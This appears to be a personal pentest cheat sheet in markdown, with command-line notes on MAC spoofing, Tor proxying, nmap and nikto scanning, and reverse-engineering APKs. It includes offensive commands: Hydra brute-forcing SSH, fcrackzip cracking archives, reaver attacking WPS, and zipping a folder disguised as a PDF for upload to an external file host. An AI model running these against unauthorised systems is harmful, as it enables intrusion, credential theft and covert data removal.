Skip to content

Latest commit

 

History

History
executable file
·
341 lines (298 loc) · 8.64 KB

pentest.md

File metadata and controls

executable file
·
341 lines (298 loc) · 8.64 KB
Raw

Pentest

trainings, tutors, interesting links

security cheat sheet open source software

Tools

  • http://www.mh-sec.de/downloads.html.en
  • Burp Suite
    • JSON Beautifier
    • Param miner
    • HTTP Request Smuggler
    • Backslash Powered Scanner
    • Reflected Parameters
    • Software Vulnerability Scanner
    • Java Deserialization Scanner
    • .Net Beautifier
    • Copy As Python-Request
    • Collaborator Everywhere
    • Custom Parameter Handler
    • Authmatrix
    • GraphQL Raider
    • Piper
    • JSON Web Token Attacker
    • InQl - Introspection GraphQL Scanner
  • TODO: shodan

OS

Phone OS

Linux OS for phone

Linux OS for phone tools

Messengers

Free hosting

  1. 000WebHost
  2. InfinityFree
  3. AwardSpace
  4. GitHub Pages
  5. Netlify
  6. Wix
  7. WordPress
  8. SquareSpace

connection

change mac address

# list of devices
iw dev

# sudo apt-get install macchanger
macchanger -s wlp1s0
sudo ifconfig wlp1s0 down
# ip link set wlp1s0 down
sudo macchanger -r wlp1s0
sudo ifconfig wlp1s0 up
macchanger -s wlp1s0

list of all accessible wifi points

# force rescan 
nmcli device wifi rescan
# all points
nmcli device wifi
# all fields 
nmcli -f ALL device wifi
# all fields with using in script 
nmcli -t -f ALL device wifi
nmcli -m multiline  -f ALL device wifi

# alternative way 
iwlist wlan0 scan 

# alternative way
iw wlan0 scan

# alternative way
sudo apt install wavemon

connect to selected network

# install tool
apt-get install wireless-tools wpasupplicant
# save password
wpa_passphrase YourSSID >> /etc/wpa_supplicant.conf

# check adapter
iwconfig
# connect to netowrk
wpa_supplicant -D wext -i wlan0 -B -c /etc/wpa_supplicant.conf

# sudo systemctl restart wpa_supplicant

check your current IP address

  • check ip address via proxy
curl --proxy localhost:8118 'https://api.ipify.org'
curl 'https://api.ipify.org'
curl --silent -X GET https://getfoxyproxy.org/geoip/ | grep -A 2 "Your IP Address and Location" | awk -F "strong" '{print $2 $4}' | tr '><' ' '
  • check ip address directly
curl 'https://api.ipify.org'
curl 'https://api.ipify.org?format=json'

activate tor connection

  • installation
sudo apt install tor
sudo apt install privoxy
  • configuration sudo vim /etc/privoxy/config
forward-socks5t / 127.0.0.1:9050 .
forward-socks4a / 127.0.0.1:9050 .
  • applying
# tor
sudo service tor restart
# /etc/init.d/privoxy start
sudo service privoxy restart
  • check your ip afterwards
# via TOR 
curl --proxy localhost:8118 'https://api.ipify.org'
# direct connect
curl 'https://api.ipify.org'
  • stop, stop tor, stop private proxy
systemctl stop tor
systemctl status tor

systemctl stop privoxy
systemctl status privoxy

proxy

proxy list tools

https://github.com/cherkavi/python-utilitites/blob/master/proxy/foxyproxy-generator.py
https://addons.mozilla.org/de/firefox/addon/foxyproxy-standard/

Remote host analyzing

whois cli console whois

# apt install whois
whois google.com

scan ports

nmap -sV -p 1-65535 {hostname}

web scan

nikto -h {host name}

cms detector ContentManagementSystem detector

https://www.web4future.com/free/cms-detector.htm
https://whatcms.org
https://builtwith.com

detect possible endpoints

[2ip.ru/cms](find cms)

/rotots.txt
/admin.php
/admin
/admin/admin.php
/manager
/administrator
/login

Request information

browser request headers, what browser sends

Remote host connection

Hydra

# installation
apt install hydra
# usage: hydra -l <username> -p <password> <server> <service> -o <log output file> -s <custom service port> 
# usage: hydra -L <username file> -P <password file> <server> <service>
# usage: hydra -l <username> -p <password> -M <server list> <service> -o <log output file> -s <custom service port> 
# usage: hydra -C <file with login:password colon delimiter> -M <server list> <service> -o <log output file> -s <custom service port> 

hydra -l admin -p admin_pass 10.10.10.10 ssh
hydra -L logins.txt -P passwords.txt 10.10.10.10 ssh -o output.log

GSM

phone info

HLR request

sms

sms receive sms receive

e-mail

just create login & password

for changing manually - Cookies->https://temp-mail.org->email

after one day not possible to recover email address

files

zip -r archive.zip folder/to/compress
mv archive.zip archive.pdf
vim archive.pdf # "%PDF-1.5"
curl -i -F name=some-archive.pdf -F [email protected] https://uguu.se/api.php?d=upload | grep "uguu.se"
wget https://a.uguu.se/1JQuulht48T6_1571004483891-2.pdf

archive

open zip with brute force zip

# sudo apt install fcrackzip
fcrackzip --brute-force --length 1-20 --use-unzip 1.zip
fcrackzip -v -u -b 1.zip

# statistic: 8 chars - 62 days

wifi

initiate monitor mode on interface

ifconfig 
# ( result - wlan0 )
airmon-ng check kill
airmon-ng check 
# ( should be empty )
airmon-ng start wlan0 
# ( result - wlan0mon )
airodump-ng wlan0mon 
# ( result - BSSID )
reaver -i wlan0mon -b <BSSID> -vv -K 1

md5sum, hash

https://hashkiller.co.uk/Cracker/MD5
https://md5decrypt.net
https://www.md5.ovh/index.php?controller=Api
https://crackstation.net/

android

android market

reverse engineering

apk to jar

apk to jar download

unzip -o ~/Downloads/dex2jar-2.1.zip -d ~/Downloads/

apk to jar use

APK_NAME=my_app
PATH_TO_APK="${APK_NAME}.apk"
PATH_TO_DEX2JAR=~/Downloads/dex-toos-2.1/d2j-dex2jar.sh

sh $PATH_TO_DEX2JAR -f $PATH_TO_APK
# result
ls -la "${APK_NAME}-dex2jar.jar"

jar to java

jar to java download

jar to java tool jar to java tool download

jar to java usage

java -jar jd-gui-1.6.6-min.jar

bitcoin

electrum wallet

sudo apt install python3-pip python3-setuptools python3-pyqt5 libsecp256k1-dev
ELECTRUM_VERSION=4.3.2 # https://download.electrum.org/
pip3 install https://download.electrum.org/${ELECTRUM_VERSION}/Electrum-${ELECTRUM_VERSION}.tar.gz#egg=electrum[fast]